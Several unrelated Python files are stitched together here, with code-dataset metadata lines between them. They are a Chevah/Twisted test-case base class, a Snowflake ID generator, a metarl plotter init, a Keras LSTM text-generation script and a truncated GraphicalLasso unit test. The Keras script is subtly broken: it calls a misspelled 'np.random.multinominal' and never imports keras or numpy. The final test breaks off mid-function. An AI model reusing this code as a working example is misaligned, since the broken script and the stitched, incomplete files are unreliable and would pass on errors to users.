raise_failure('queued threads', reactor.threadCallQueue)
if reactor.threadpool and len(reactor.threadpool.working) > 0:
raise_failure('active threads', reactor.threadCallQueue)
pool_queue = self._threadPoolQueue()
if pool_queue:
raise_failure('threadpoool queue', pool_queue)
if self._threadPoolWorking():
raise_failure('threadpoool working', self._threadPoolWorking())
if self._threadPoolThreads():
raise_failure('threadpoool threads', self._threadPoolThreads())
if len(reactor.getWriters()) > 0: # noqa:cover
raise_failure('writers', text_type(reactor.getWriters()))
for reader in reactor.getReaders():
excepted = False
for reader_type in self.EXCEPTED_READERS:
if isinstance(reader, reader_type):
excepted = True
break
if not excepted: # noqa:cover
raise_failure('readers', text_type(reactor.getReaders()))
for delayed_call in reactor.getDelayedCalls():
if delayed_call.active():
delayed_str = self._getDelayedCallName(delayed_call)
if delayed_str in self.EXCEPTED_DELAYED_CALLS:
continue
raise_failure('delayed calls', delayed_str)
def _runDeferred(
self, deferred, timeout=None, debug=False, prevent_stop=False):
"""
This is low level method. In most tests you would like to use
`getDeferredFailure` or `getDeferredResult`.
Run the deferred in the reactor loop.
Starts the reactor, waits for deferred execution,
raises error in timeout, stops the reactor.
This will do recursive calls, in case the original deferred returns
another deferred.
Usage::
checker = mk.credentialsChecker()
credentials = mk.credentials()
deferred = checker.requestAvatarId(credentials)
self._runDeferred(deferred)
self.assertIsNotFailure(deferred)
self.assertEqual('something', deferred.result)
"""
if not isinstance(deferred, Deferred):
raise AssertionError('This is not a deferred.')
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
try:
self._initiateTestReactor(timeout=timeout)
self._executeDeferred(deferred, timeout, debug=debug)
finally:
self._shutdownTestReactor(
prevent_stop=prevent_stop)
def _executeDeferred(self, deferred, timeout, debug):
"""
Does the actual deferred execution.
"""
if not deferred.called:
deferred_done = False
while not deferred_done:
self._iterateTestReactor(debug=debug)
deferred_done = deferred.called
if self._timeout_reached:
raise AssertionError(
'Deferred took more than %d to execute.' % timeout)
# Check executing all deferred from chained callbacks.
result = deferred.result
while isinstance(result, Deferred):
self._executeDeferred(result, timeout=timeout, debug=debug)
result = deferred.result
def executeReactor(self, timeout=None, debug=False, run_once=False):
"""
Run reactor until no more delayed calls, readers or
writers or threads are in the queues.
Set run_once=True to only run the reactor once. This is useful if
you have persistent deferred which will be removed only at the end
of test.
Only use this for very high level integration code, where you don't
have the change to get a "root" deferred.
In most tests you would like to use one of the
`getDeferredFailure` or `getDeferredResult`.
Usage::
protocol = mk.makeFTPProtocol()
transport = mk.makeStringTransportProtocol()
protocol.makeConnection(transport)
transport.protocol = protocol
protocol.lineReceived('FEAT')
self.executeReactor()
result = transport.value()
self.assertStartsWith('211-Features:\n', result)
"""
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
self._initiateTestReactor(timeout=timeout)
# Set it to True to enter the first loop.
have_callbacks = True
while have_callbacks and not self._timeout_reached:
self._iterateTestReactor(debug=debug)
have_callbacks = False
# Check for active jobs in thread pool.
if reactor.threadpool:
if (
reactor.threadpool.working or
(reactor.threadpool.q.qsize() > 0)
):
time.sleep(0.01)
have_callbacks = True
continue
# Look at delayed calls.
for delayed in reactor.getDelayedCalls():
# We skip our own timeout call.
if delayed is self._reactor_timeout_call:
continue
if not delayed.func:
# Was already called.
continue
delayed_str = self._getDelayedCallName(delayed)
is_exception = False
for excepted_callback in self.EXCEPTED_DELAYED_CALLS:
if excepted_callback in delayed_str:
is_exception = True
if not is_exception:
# No need to look for other delayed calls.
have_callbacks = True
break
# No need to look for other things as we already know that we need
# to wait at least for delayed calls.
if have_callbacks:
continue
if run_once:
if have_callbacks:
raise AssertionError(
'Reactor queue still contains delayed deferred.\n'
'%s' % (self._reactorQueueToString()))
break
# Look at writers buffers:
if len(reactor.getWriters()) > 0:
have_callbacks = True
continue
for reader in reactor.getReaders():
have_callbacks = True
for excepted_reader in self.EXCEPTED_READERS:
if isinstance(reader, excepted_reader):
have_callbacks = False
break
if have_callbacks:
break
if have_callbacks:
continue
# Look at threads queue and active thread.
if len(reactor.threadCallQueue) > 0:
have_callbacks = True
continue
if reactor.threadpool and len(reactor.threadpool.working) > 0:
have_callbacks = True
continue
self._shutdownTestReactor()
def executeDelayedCalls(self, timeout=None, debug=False):
"""
Run the reactor until no more delayed calls are scheduled.
This will wait for delayed calls to be executed and will not stop
the reactor.
"""
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
self._initiateTestReactor(timeout=timeout)
while not self._timeout_reached:
self._iterateTestReactor(debug=debug)
delayed_calls = reactor.getDelayedCalls()
try:
delayed_calls.remove(self._reactor_timeout_call)
except ValueError: # noqa:cover
# Timeout might be no longer be there.
pass
if not delayed_calls:
break
self._shutdownTestReactor(prevent_stop=True)
if self._reactor_timeout_failure is not None:
self._reactor_timeout_failure = None
# We stop the reactor on failures.
self._shutdownTestReactor()
raise AssertionError(
'executeDelayedCalls took more than %s' % (timeout,))
def executeReactorUntil(
self, callable, timeout=None, debug=False, prevent_stop=True):
"""
Run the reactor until callable returns `True`.
"""
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
self._initiateTestReactor(timeout=timeout)
while not self._timeout_reached:
self._iterateTestReactor(debug=debug)
if callable(reactor):
break
self._shutdownTestReactor(prevent_stop=prevent_stop)
def iterateReactor(self, count=1, timeout=None, debug=False):
"""
Iterate the reactor without stopping it.
"""
iterations = [False] * (count - 1)
iterations.append(True)
self.executeReactorUntil(
lambda _: iterations.pop(0), timeout=timeout, debug=debug)
def iterateReactorWithStop(self, count=1, timeout=None, debug=False):
"""
Iterate the reactor and stop it at the end.
"""
iterations = [False] * (count - 1)
iterations.append(True)
self.executeReactorUntil(
lambda _: iterations.pop(0),
timeout=timeout,
debug=debug,
prevent_stop=False,
)
def iterateReactorForSeconds(self, duration=1, debug=False):
"""
Iterate the reactor for `duration` seconds..
"""
start = time.time()
self.executeReactorUntil(
lambda _: time.time() - start > duration,
timeout=duration + 0.1,
debug=debug,
prevent_stop=False,
)
def _getDelayedCallName(self, delayed_call):
"""
Return a string representation of the delayed call.
"""
raw_name = text_type(delayed_call.func)
raw_name = raw_name.replace('<function ', '')
raw_name = raw_name.replace('<bound method ', '')
return raw_name.split(' ', 1)[0]
def getDeferredFailure(
self, deferred, timeout=None, debug=False, prevent_stop=False):
"""
Run the deferred and return the failure.
Usage::
checker = mk.credentialsChecker()
credentials = mk.credentials()
deferred = checker.requestAvatarId(credentials)
failure = self.getDeferredFailure(deferred)
self.assertFailureType(AuthenticationError, failure)
"""
self._runDeferred(
deferred,
timeout=timeout,
debug=debug,
prevent_stop=prevent_stop,
)
self.assertIsFailure(deferred)
failure = deferred.result
self.ignoreFailure(deferred)
return failure
def successResultOf(self, deferred):
"""
Return the current success result of C{deferred} or raise
C{self.failException}.
@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which
has a success result. This means
L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or
L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has
been called on it and it has reached the end of its callback chain
and the last callback or errback returned a
non-L{failure.Failure}.
@type deferred: L{Deferred<twisted.internet.defer.Deferred>}
@raise SynchronousTestCase.failureException: If the
L{Deferred<twisted.internet.defer.Deferred>} has no result or has
a failure result.
@return: The result of C{deferred}.
"""
# FIXME:1370:
# Remove / re-route this code after upgrading to Twisted 13.0.
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Success result expected on %r, found no result instead" % (
deferred,))
elif isinstance(result[0], Failure):
self.fail(
"Success result expected on %r, "
"found failure result instead:\n%s" % (
deferred, result[0].getBriefTraceback().decode(
'utf-8', errors='replace')))
else:
return result[0]
def failureResultOf(self, deferred, *expectedExceptionTypes):
"""
Return the current failure result of C{deferred} or raise
C{self.failException}.
@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which
has a failure result. This means
L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or
L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has
been called on it and it has reached the end of its callback chain
and the last callback or errback raised an exception or returned a
L{failure.Failure}.
@type deferred: L{Deferred<twisted.internet.defer.Deferred>}
@param expectedExceptionTypes: Exception types to expect - if
provided, and the the exception wrapped by the failure result is
not one of the types provided, then this test will fail.
@raise SynchronousTestCase.failureException: If the
L{Deferred<twisted.internet.defer.Deferred>} has no result, has a
success result, or has an unexpected failure result.
@return: The failure result of C{deferred}.
@rtype: L{failure.Failure}
"""
# FIXME:1370:
# Remove / re-route this code after upgrading to Twisted 13
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Failure result expected on %r, found no result instead" % (
deferred,))
elif not isinstance(result[0], Failure):
self.fail(
"Failure result expected on %r, "
"found success result (%r) instead" % (deferred, result[0]))
elif (expectedExceptionTypes and
not result[0].check(*expectedExceptionTypes)):
expectedString = " or ".join([
'.'.join((t.__module__, t.__name__)) for t in
expectedExceptionTypes])
self.fail(
"Failure of type (%s) expected on %r, "
"found type %r instead: %s" % (
expectedString, deferred, result[0].type,
result[0].getBriefTraceback().decode(
'utf-8', errors='replace')))
else:
return result[0]
def assertNoResult(self, deferred):
"""
Assert that C{deferred} does not have a result at this point.
If the assertion succeeds, then the result of C{deferred} is left
unchanged. Otherwise, any L{failure.Failure} result is swallowed.
@param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
without a result. This means that neither
L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor
L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has
been called, or that the
L{Deferred<twisted.internet.defer.Deferred>} is waiting on another
L{Deferred<twisted.internet.defer.Deferred>} for a result.
@type deferred: L{Deferred<twisted.internet.defer.Deferred>}
@raise SynchronousTestCase.failureException: If the
L{Deferred<twisted.internet.defer.Deferred>} has a result.
"""
# FIXME:1370:
# Remove / re-route this code after upgrading to Twisted 13
result = []
def cb(res):
result.append(res)
return res
deferred.addBoth(cb)
if result:
# If there is already a failure, the self.fail below will
# report it, so swallow it in the deferred
deferred.addErrback(lambda _: None)
self.fail(
"No result expected on %r, found %r instead" % (
deferred, result[0]))
def getDeferredResult(
self, deferred, timeout=None, debug=False, prevent_stop=False):
"""
Run the deferred and return the result.
Usage::
checker = mk.credentialsChecker()
credentials = mk.credentials()
deferred = checker.requestAvatarId(credentials)
result = self.getDeferredResult(deferred)
self.assertEqual('something', result)
"""
self._runDeferred(
deferred,
timeout=timeout,
debug=debug,
prevent_stop=prevent_stop,
)
self.assertIsNotFailure(deferred)
return deferred.result
def assertWasCalled(self, deferred):
"""
Check that deferred was called.
"""
if not deferred.called:
raise AssertionError('This deferred was not called yet.')
def ignoreFailure(self, deferred):
"""
Ignore the current failure on the deferred.
It transforms an failure into result `None` so that the failure
will not be raised at reactor shutdown for not being handled.
"""
deferred.addErrback(lambda failure: None)
def assertIsFailure(self, deferred):
"""
Check that deferred is a failure.
"""
if not isinstance(deferred.result, Failure):
raise AssertionError('Deferred is not a failure.')
def assertIsNotFailure(self, deferred):
"""
Raise assertion error if deferred is a Failure.
The failed deferred is handled by this method, to avoid propagating
the error into the reactor.
"""
self.assertWasCalled(deferred)
if isinstance(deferred.result, Failure):
error = deferred.result
self.ignoreFailure(deferred)
raise AssertionError(
'Deferred contains a failure: %s' % (error))
def _get_os_version():
"""
On non-Linux this is just the os_name.
On Linux is the distribution name and the version.
On Windows it is the `nt` followed by the major and minor NT version.
It is not the marketing name.
We only support the Windows NT family.
See: https://en.wikipedia.org/wiki/Windows_NT#Releases
On OSX it returns `osx` followed by the version.
It is not the version of the underlying Darwin OS.
See: https://en.wikipedia.org/wiki/MacOS#Release_history
"""
if os.name == 'nt':
parts = platform.version().split('.')
return 'nt-%s.%s' % (parts[0], parts[1])
# We are now in Unix zone.
os_name = os.uname()[0].lower()
if os_name == 'darwin':
parts = platform.mac_ver()[0].split('.')
return 'osx-%s.%s' % (parts[0], parts[1])
if os_name == 'sunos':
parts = platform.release().split('.')
return 'solaris-%s' % (parts[1],)
if os_name == 'aix': # noqa:cover
return 'aix-%s.%s' % (platform.version(), platform.release())
if os_name != 'linux':
return process_capabilities.os_name
# We delay the import as it will call lsb_release.
import ld
distro_name = ld.id()
if distro_name == 'arch':
# Arch has no version.
return 'arch'
if distro_name in ['centos', 'ol']:
# Normalize all RHEL variants.
distro_name = 'rhel'
distro_version = ld.version().split('.', 1)[0]
return '%s-%s' % (distro_name, distro_version)
def _get_cpu_type():
"""
Return the CPU type as used in the brink.sh script.
"""
base = platform.processor()
if base == 'aarch64':
return 'arm64'
if base == 'x86_64':
return 'x64'
return base
_CI_NAMES = Bunch(
LOCAL='local',
GITHUB='github-actions',
TRAVIS='travis',
BUILDBOT='buildbot',
UNKNOWN='unknown-ci',
AZURE='azure-pipelines',
)
def _get_ci_name():
"""
Return the name of the CI on which the tests are currently executed.
"""
if os.environ.get('BUILDBOT', '').lower() == 'true':
return _CI_NAMES.BUILDBOT
if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true':
return _CI_NAMES.GITHUB
if os.environ.get('TRAVIS', '').lower() == 'true':
return _CI_NAMES.TRAVIS
if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES':
return _CI_NAMES.AZURE
if os.environ.get('CI', '').lower() == 'true':
return _CI_NAMES.UNKNOWN
return _CI_NAMES.LOCAL
class ChevahTestCase(TwistedTestCase, AssertionMixin):
"""
Test case for Chevah tests.
Checks that temporary folder is clean at exit.
"""
os_name = process_capabilities.os_name
os_family = process_capabilities.os_family
os_version = _get_os_version()
cpu_type = process_capabilities.cpu_type
ci_name = _get_ci_name()
CI = _CI_NAMES
TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN')
# List of partial thread names to ignore during the tearDown.
# No need for the full thread name
excepted_threads = [
'MainThread',
'threaded_reactor',
'GlobalPool-WorkerHandler',
'GlobalPool-TaskHandler',
'GlobalPool-ResultHandler',
'PoolThread-twisted.internet.reactor',
]
# We assume that hostname does not change during test and this
# should save a few DNS queries.
hostname = _get_hostname()
Bunch = Bunch
Mock = Mock
#: Obsolete. Please use self.patch and self.patchObject.
Patch = patch
_environ_user = None
_drop_user = '-'
def setUp(self):
super(ChevahTestCase, self).setUp()
self.__cleanup__ = []
self._cleanup_stack = []
self._teardown_errors = []
self.test_segments = None
def tearDown(self):
self.callCleanup()
self._checkTemporaryFiles()
threads = threading.enumerate()
if len(threads) > 1:
for thread in threads:
thread_name = thread.getName()
if self._isExceptedThread(thread_name):
continue
self._teardown_errors.append(AssertionError(
'There are still active threads, '
'beside the main thread: %s - %s' % (
thread_name, threads)))
super(ChevahTestCase, self).tearDown()
errors, self._teardown_errors = self._teardown_errors, None
if errors:
raise AssertionError('Cleanup errors: %r' % (errors,))
def _isExceptedThread(self, name):
"""
Return `True` if is OK for thread to exist after test is done.
"""
for exception in self.excepted_threads:
if name in exception:
return True
if exception in name:
return True
return False
def addCleanup(self, function, *args, **kwargs):
"""
Overwrite unit-test behaviour to run cleanup method before tearDown.
"""
self.__cleanup__.append((function, args, kwargs))
def callCleanup(self):
"""
Call all cleanup methods.
If a cleanup fails, the next cleanups will continue to be called and
the first failure is raised.
"""
for function, args, kwargs in reversed(self.__cleanup__):
try:
function(*args, **kwargs)
except Exception as error: # noqa:cover
self._teardown_errors.append(error)
self.__cleanup__ = []
def enterCleanup(self):
"""
Called when start using stacked cleanups.
"""
self._cleanup_stack.append(self.__cleanup__)
self.__cleanup__ = []
def exitCleanup(self):
"""
To be called at the end of a stacked cleanup.
"""
self.callCleanup()
self.__cleanup__ = self._cleanup_stack.pop()
@contextlib.contextmanager
def stackedCleanup(self):
"""
Context manager for stacked cleanups.
"""
try:
self.enterCleanup()
yield
finally:
self.exitCleanup()
def _checkTemporaryFiles(self):
"""
Check that no temporary files or folders are present.
"""
# FIXME:922:
# Move all filesystem checks into a specialized class
if self.test_segments:
if mk.fs.isFolder(self.test_segments):
mk.fs.deleteFolder(
self.test_segments, recursive=True)
else:
mk.fs.deleteFile(self.test_segments)
checks = [
self.assertTempIsClean,
self.assertWorkingFolderIsClean,
]
errors = []
for check in checks:
try:
check()
except AssertionError as error:
errors.append(error.message)
if errors: # noqa:cover
self._teardown_errors.append(AssertionError(
'There are temporary files or folders left over.\n %s' % (
'\n'.join(errors))))
def shortDescription(self): # noqa:cover
"""
The short description for the test.
bla.bla.tests. is removed.
The format is customized for Chevah Nose runner.
This is only called when we run with -v or we show the error.
"""
class_name = text_type(self.__class__)[8:-2]
class_name = class_name.replace('.Test', ':Test')
tests_start = class_name.find('.tests.') + 7
class_name = class_name[tests_start:]
return "%s - %s.%s" % (
self._testMethodName,
class_name,
self._testMethodName)
def assertRaises(self, exception_class, callback=None, *args, **kwargs):
"""
Wrapper around the stdlib call to allow non-context usage.
"""
super_assertRaises = super(ChevahTestCase, self).assertRaises
if callback is None:
return super_assertRaises(exception_class)
with super_assertRaises(exception_class) as context:
callback(*args, **kwargs)
return context.exception
def assertSequenceEqual(self, first, second, msg, seq_type):
super(ChevahTestCase, self).assertSequenceEqual(
first, second, msg, seq_type)
for first_element, second_element in zip(first, second):
self.assertEqual(first_element, second_element)
def assertDictEqual(self, first, second, msg):
super(ChevahTestCase, self).assertDictEqual(first, second, msg)
first_keys = sorted(first.keys())
second_keys = sorted(second.keys())
first_values = [first[key] for key in first_keys]
second_values = [second[key] for key in second_keys]
self.assertSequenceEqual(first_keys, second_keys, msg, list)
self.assertSequenceEqual(first_values, second_values, msg, list)
def assertSetEqual(self, first, second, msg):
super(ChevahTestCase, self).assertSetEqual(first, second, msg)
first_elements = sorted(first)
second_elements = sorted(second)
self.assertSequenceEqual(first_elements, second_elements, msg, list)
def _baseAssertEqual(self, first, second, msg=None):
"""
Update to stdlib to make sure we don't compare str with unicode.
"""
if (
isinstance(first, text_type) and
not isinstance(second, text_type)
): # noqa:cover
if not msg:
msg = u'First is unicode while second is str for "%s".' % (
first,)
raise AssertionError(msg.encode('utf-8'))
if (
not isinstance(first, text_type) and
isinstance(second, text_type)
): # noqa:cover
if not msg:
msg = u'First is str while second is unicode for "%s".' % (
first,)
raise AssertionError(msg.encode('utf-8'))
return super(ChevahTestCase, self)._baseAssertEqual(
first, second, msg=msg)
@staticmethod
def getHostname():
"""
Return the hostname of the current system.
"""
return _get_hostname()
@classmethod
def initialize(cls, drop_user):
"""
Initialize the testing environment.
"""
cls._drop_user = drop_user
os.environ['DROP_USER'] = drop_user
if 'LOGNAME' in os.environ and 'USER' not in os.environ:
os.environ['USER'] = os.environ['LOGNAME']
if 'USER' in os.environ and 'USERNAME' not in os.environ:
os.environ['USERNAME'] = os.environ['USER']
if 'USERNAME' in os.environ and 'USER' not in os.environ:
os.environ['USER'] = os.environ['USERNAME']
cls._environ_user = os.environ['USER']
cls.cleanTemporaryFolder()
@classmethod
def dropPrivileges(cls):
'''Drop privileges to normal users.'''
if cls._drop_user == '-':
return
os.environ['USERNAME'] = cls._drop_user
os.environ['USER'] = cls._drop_user
# Test suite should be started as root and we drop effective user
# privileges.
system_users.dropPrivileges(username=cls._drop_user)
@staticmethod
def skipTest(message=''):
'''Return a SkipTest exception.'''
return SkipTest(message)
@property
def _caller_success_member(self):
'''Retrieve the 'success' member from the test case.'''
success_state = None
# We search starting with second stack, since first stack is the
# current stack and we don't care about it.
for level in inspect.stack()[1:]:
try:
success_state = level[0].f_locals['success']
break
except KeyError:
success_state = None
if success_state is None:
raise AssertionError('Failed to find "success" attribute.')
return success_state
@staticmethod
def patch(*args, **kwargs):
"""
Helper for generic patching.
"""
return patch(*args, **kwargs)
@staticmethod
def patchObject(*args, **kwargs):
"""
Helper for patching objects.
"""
return patch.object(*args, **kwargs)
def now(self):
"""
Return current Unix timestamp.
"""
return time.time()
@classmethod
def cleanTemporaryFolder(cls):
"""
Clean all test files from temporary folder.
Return a list of members which were removed.
"""
return cls._cleanFolder(mk.fs.temp_segments)
@classmethod
def cleanWorkingFolder(cls):
path = mk.fs.getAbsoluteRealPath('.')
segments = mk.fs.getSegmentsFromRealPath(path)
return cls._cleanFolder(segments, only_marked=True)
@classmethod
def _cleanFolder(cls, folder_segments, only_marked=False):
"""
Clean all test files from folder_segments.
Return a list of members which were removed.
"""
if not mk.fs.exists(folder_segments):
return []
# In case we are running the test suite as super user,
# we use super filesystem for cleaning.
if cls._environ_user == cls._drop_user:
temp_avatar = SuperAvatar()
else:
temp_avatar = DefaultAvatar()
temp_filesystem = LocalFilesystem(avatar=temp_avatar)
temp_members = []
for member in (temp_filesystem.getFolderContent(folder_segments)):
if only_marked and member.find(TEST_NAME_MARKER) == -1:
continue
temp_members.append(member)
segments = folder_segments[:]
segments.append(member)
if temp_filesystem.isFolder(segments):
temp_filesystem.deleteFolder(segments, recursive=True)
else:
temp_filesystem.deleteFile(segments)
return temp_members
@classmethod
def getPeakMemoryUsage(cls):
"""
Return maximum memory usage in kilo bytes.
"""
if cls.os_family == 'posix':
import resource
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
elif cls.os_family == 'nt':
from wmi import WMI
local_wmi = WMI('.')
query = (
u'SELECT PeakWorkingSetSize '
u'FROM Win32_Process '
u'WHERE Handle=%d' % os.getpid())
result = local_wmi.query(query.encode('utf-8'))
peak_working_set_size = int(result[0].PeakWorkingSetSize)
# FIXME:2099:
# Windows XP reports value in bytes, instead of Kilobytes.
return int(peak_working_set_size)
else:
raise AssertionError('OS not supported.')
def folderInTemp(self, *args, **kwargs):
"""
Create a folder in the default temp folder and mark it for cleanup.
"""
kwargs['cleanup'] = self.addCleanup
return mk.fs.folderInTemp(*args, **kwargs)
def fileInTemp(self, *args, **kwargs):
"""
Create a file in the default temp folder and mark it for cleanup.
"""
kwargs['cleanup'] = self.addCleanup
return mk.fs.fileInTemp(*args, **kwargs)
def assertIn(self, target, source):
"""
Overwrite stdlib to swap the arguments.
"""
if source not in target:
message = u'%s not in %s.' % (repr(source), repr(target))
raise AssertionError(message.encode('utf-8'))
def assertIsInstance(self, expected_type, value, msg=None):
"""
Raise an exception if `value` is not an instance of `expected_type`
"""
# In Python 2.7 isInstance is already defined, but with swapped
# arguments.
if not inspect.isclass(expected_type):
expected_type, value = value, expected_type
if not isinstance(value, expected_type):
raise AssertionError(
"Expecting type %s, but got %s. %s" % (
expected_type, type(value), msg))
def tempPath(self, prefix='', suffix=''):
"""
Return (path, segments) for a path which is not created yet.
"""
return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix)
def tempPathCleanup(self, prefix='', suffix=''):
"""
Return (path, segments) for a path which is not created yet but which
will be automatically removed.
"""
return mk.fs.pathInTemp(
cleanup=self.addCleanup, prefix=prefix, suffix=suffix)
def tempFile(self, content='', prefix='', suffix='', cleanup=True):
"""
Return (path, segments) for a new file created in temp which is
auto cleaned.
"""
segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix)
path = mk.fs.getRealPathFromSegments(segments)
if cleanup:
self.addCleanup(mk.fs.deleteFile, segments)
try:
opened_file = mk.fs.openFileForWriting(segments)
opened_file.write(content)
finally:
opened_file.close()
return (path, segments)
def tempFolder(self, name=None, prefix='', suffix=''):
"""
Create a new temp folder and return its path and segments, which is
auto cleaned.
"""
segments = mk.fs.createFolderInTemp(
foldername=name, prefix=prefix, suffix=suffix)
path = mk.fs.getRealPathFromSegments(segments)
self.addCleanup(mk.fs.deleteFolder, segments, recursive=True)
return (path, segments)
class FileSystemTestCase(ChevahTestCase):
"""
Common test case for all file-system tests using a real OS account.
"""
@classmethod
def setUpClass(cls):
# FIXME:924:
# Disabled when we can not find the home folder path.
if not process_capabilities.get_home_folder:
raise cls.skipTest()
super(FileSystemTestCase, cls).setUpClass()
cls.os_user = cls.setUpTestUser()
home_folder_path = system_users.getHomeFolder(
username=cls.os_user.name, token=cls.os_user.token)
cls.avatar = mk.makeFilesystemOSAvatar(
name=cls.os_user.name,
home_folder_path=home_folder_path,
token=cls.os_user.token,
)
cls.filesystem = LocalFilesystem(avatar=cls.avatar)
@classmethod
def tearDownClass(cls):
if not cls.os_user.windows_create_local_profile:
os_administration.deleteHomeFolder(cls.os_user)
os_administration.deleteUser(cls.os_user)
super(FileSystemTestCase, cls).tearDownClass()
@classmethod
def setUpTestUser(cls):
"""
Set-up OS user for file system testing.
"""
from chevah.compat.testing import TEST_ACCOUNT_GROUP
user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP)
os_administration.addUser(user)
return user
def setUp(self):
super(FileSystemTestCase, self).setUp()
# Initialized only to clean the home folder.
test_filesystem = LocalTestFilesystem(avatar=self.avatar)
test_filesystem.cleanHomeFolder()
class OSAccountFileSystemTestCase(FileSystemTestCase):
"""
Test case for tests that need a dedicated local OS account present.
"""
#: User will be created before running the test case and removed on
#: teardown.
CREATE_TEST_USER = None
@classmethod
def setUpTestUser(cls):
"""
Add `CREATE_TEST_USER` to local OS.
"""
os_administration.addUser(cls.CREATE_TEST_USER)
return cls.CREATE_TEST_USER
| 2 | 2 |
web/snowflake.py | jphacks/C_2118 | 0 | 1237 | <gh_stars>0
import time
class Snowflake:
def __init__(self, init_serial_no=0):
self.machine_id = 0
self.epoch = 0
self.serial_no = init_serial_no
def generate(self):
unique_id = (
((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF) << 22
| (self.machine_id & 0x3FF) << 12
| (self.serial_no & 0xFFF)
)
self.serial_no += 1
return unique_id
| 2.59375 | 3 |
src/metarl/tf/plotter/__init__.py | icml2020submission6857/metarl | 2 | 1238 | from metarl.tf.plotter.plotter import Plotter
__all__ = ['Plotter']
| 1.148438 | 1 |
generative_deep_learning/build_network.py | slaily/deep-learning-bits | 0 | 1239 | from keras import layers
# Single-layer LSTM model for next-character prediction
model = keras.models.Sequential()
model.add(layers.LSTM(128, input_shape=(maxlen, len(chars))))
model.add(layers.Dense(len(chars), activation='softmax'))
# Model compilation configuration
optimizer = keras.optimizers.RMSprop(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=optimizer)
# Function to sample the next character given the model’s predictions
def sample(preds, temperature=1.0):
preds = np.asarray(preds).astype('float64')
preds = np.log(preds) / temperature
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
probas = np.random.multinominal(1, preds, 1)
return np.argmax(probas)
# Text-generation loop
import sys
import random
# Trains the model for 60 epochs
for epoch in range(1, 60):
print(f'Epoch: {epoch}')
model.fit(x, y, batch_size=128, epochs=1)
# Selects a text seed at random
start_index = random.randint(0, len(text) - maxlen - 1)
generated_text = text[start_index: start_index + maxlen]
print(f'--- Generating with seed: {generated_text} ---')
# Tries a range of different sampling temperatures
for temperature in [0.2, 0.5, 1.0, 1.2]:
print(f'--- Temperature {temperature} ---')
sys.stdout.write(generated_text)
# Generates 400 characters, starting from the seed text
for i in range(400):
sampled = np.zeros((1, maxlen, len(chars)))
for t, char in enumerate(generated_text):
sampled[0, t, char_indices[char]] = 1.
# Samples the next character
preds = model.predict(sampled, verbose=0)[0]
next_index = sample(preds, temperature)
next_char = chars[next_index]
generated_text += next_char
generated_text = generated_text[1:]
sys.stdout.write(next_char)
| 3.28125 | 3 |
tests/test_structure_learning.py | thunderbug1/pyanom | 0 | 1240 | <gh_stars>0
import io
import unittest
import numpy as np
class TestGraphicalLasso(unittest.TestCase):
"""Basic test cases."""
def _getTarget(self):
from pyanom.structure_learning import GraphicalLasso
return GraphicalLasso
def _makeOne(self, *args, **kwargs):
return self._getTarget()(*args, **kwargs)
@classmethod
def setUpClass(self):
self.X_normal = np.array([[0.975586009, -0.745997359, -0.229331244],
[-0.460992487, -1.304668238, -0.599247488],
[-0.503171745, -1.308368748, -1.451411048],
[-0.904446243, -0.287837582, 0.197153592],
[-1.106120624, 0.243612535, 1.051237763],
[0.371920628, 1.690566027, -0.468645532],
[-0.861682655, 1.472544046, -0.846863556],
[0.632918214, 1.35895507, -1.217528827],
[0.017011646, 1.556247275, -0.149119024],
[-1.129336215, 0.486811944, 0.012272206],
[0.498967152, -0.530065628, -2.14011938],
[0.402460108, -0.474465633, -0.041584595],
[-0.847994655, -1.281269721, -0.430338406],
[-0.583857254, 0.228815073, -1.321443286],
[0.963425438, -1.136873938, 0.990406269],
[-1.342349795, -0.147133485, 1.286410605],
[-0.546153552, 0.134343445, -0.380672316],
[-2.264867999, 0.227795362, 1.477762968],
[0.070095074, -0.770899782, 2.100831522],
[0.425213005, 0.796156033, 1.676164975]])
self.X_error = np.array([[-0.273095586, 0.356336588, 1.595876828],
[-0.708547003, -0.572139833, 0.858932219],
[-1.125947228, -1.049026454, 0.35980022],
[0.653070988, -0.052417831, 0.787284547],
[-1.059131881, 1.621161051, -1.295306533],
[0.499065038, -1.064179225, 1.243325767],
[0.452740621, -0.737171777, 0.352807563],
[0.626897927, -1.100559392, -0.905560876],
[1.338835274, 2.083549348, -1.280796042],
[0.264928015, 10, 2.544472412],
[-0.754827534, -1.031919195, 1.227285333],
[-0.774019674, 0.241245625, -0.989132941],
[1.298381426, 0.19445334, 2.267355363],
[1.46892843, 1.24946146, 0.322341667],
[1.057265661, -0.846614104, -0.355396321],
[0.810670486, -0.719804484, -0.943762163],
[1.169028226, 0.492444331, 0.234015505],
[-0.307091024, -1.56195639, 0.509095939],
[0.849156845, 0.533674261, 0.069183014],
[0.102812565, 8, 1.545239732]])
def test_outlier_analysis_score_shape(self):
target = self._makeOne()
target.fit(self.X_normal)
pred = target.outlier_analysis_score(self.X_error)
self.assertEqual(pred.shape, (20, 3))
def test_incorrect_feature_size(self):
X_normal = np.array([-0.056523959,
- 0.881470896,
-0.249935965,
0.186624902,
-0.30183287,
2.000815584,
0.710538188,
0.591089702,
0.099804538,
0.114730483]).reshape(-1, 1)
X_error = np.array([0.660985506,
-1.450512173,
-1.27733756,
-1.420294211,
0.737179562,
1.481425898,
-0.170147132,
-1.527687346,
0.580282631,
-3.722489636]).reshape(-1, 1)
target = self._makeOne()
